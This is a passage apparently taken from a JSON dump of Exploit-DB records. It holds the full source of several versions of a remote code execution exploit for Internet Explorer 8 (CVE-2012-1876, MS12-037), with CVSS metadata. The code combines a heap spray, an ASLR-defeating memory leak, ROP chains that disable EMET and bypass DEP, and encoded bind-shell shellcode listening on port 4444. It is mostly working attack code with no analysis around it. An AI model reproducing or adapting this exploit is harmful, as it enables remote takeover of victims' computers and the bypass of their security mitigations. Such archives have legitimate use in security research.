shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u101C%u076d\"); // EMET string\r\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n // EMET disable part 0x01 end\r\n\r\n // Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n\r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape(\"%uc0b8%u6d10\");\r\n shellcode+= unescape(\"%u8b07%u8b00\");\r\n shellcode+= unescape(\"%u6800%u10c8\");\r\n shellcode+= unescape(\"%u076d%ud0ff\");\r\n shellcode+= unescape(\"%ud468%u6d10\");\r\n shellcode+= unescape(\"%u5007%uc4b8\");\r\n shellcode+= unescape(\"%u6d10%u8b07\");\r\n shellcode+= unescape(\"%u8b00%uff00\");\r\n shellcode+= unescape(\"%u8bd0%u81f0\");\r\n shellcode+= unescape(\"%uccec%u0002\");\r\n shellcode+= unescape(\"%uc700%u2404\");\r\n shellcode+= unescape(\"%u0010%u0001\");\r\n shellcode+= unescape(\"%ufc8b%uccb9\");\r\n shellcode+= unescape(\"%u0002%u8300\");\r\n shellcode+= unescape(\"%u04c7%ue983\");\r\n shellcode+= unescape(\"%u3304%uf3c0\");\r\n shellcode+= 
unescape(\"%u54aa%ufe6a\");\r\n shellcode+= unescape(\"%ud6ff%u9090\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\r\n shellcode+= \"NTDLL\";\r\n shellcode+= unescape(\"%u0000\");\r\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\r\n shellcode+= unescape(\"%u4374%u6e6f\");\r\n shellcode+= unescape(\"%u6574%u7478\");\r\n shellcode+= unescape(\"%u6854%u6572\");\r\n shellcode+= unescape(\"%u6461%u0000\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n 
\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://www.exploit-db.com/download/33944/"}, {"lastseen": "2016-02-03T23:59:41", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037). CVE-2012-1876. Remote exploit for windows platform", "published": "2014-09-29T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "EDB-ID:34815", "href": "https://www.exploit-db.com/exploits/34815/", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass\r\n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var 
i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var 
rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var 
rop39 = rop.substring(4,8);\r\n var rop40 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\r\n var rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\r\n var rop = rop.toString(16);\r\n var rop43 = rop.substring(4,8);\r\n var rop44 = rop.substring(0,4); // } RET\r\n\r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n\r\n\r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument)\r\n shellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\r\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV 
DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value\r\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched)\r\n shellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\r\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n // EMET disable part 0x01 end\r\n\r\n // Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n\r\n // Store various pointers here\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u14eb\"); // NOPs\r\n shellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer\r\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // Store various pointers here\r\n\r\n // EMET disable part 0x02\r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR [ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH 
ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" +\r\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\r\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\r\n \"%ufe6a%ud6ff\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n 
\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34815/"}, {"lastseen": "2016-02-04T00:57:45", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037). CVE-2012-1876. 
Remote exploit for windows platform", "published": "2014-11-17T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-11-17T00:00:00", "id": "EDB-ID:35273", "href": "https://www.exploit-db.com/exploits/35273/", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.1 bypass\r\n** Exploit Coded by sickness || EMET 5.1 bypass by ryujin\r\n** http://www.offensive-security.com/vulndev/disarming-and-bypassing-emet-5-1/\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.1\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00c2\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = 
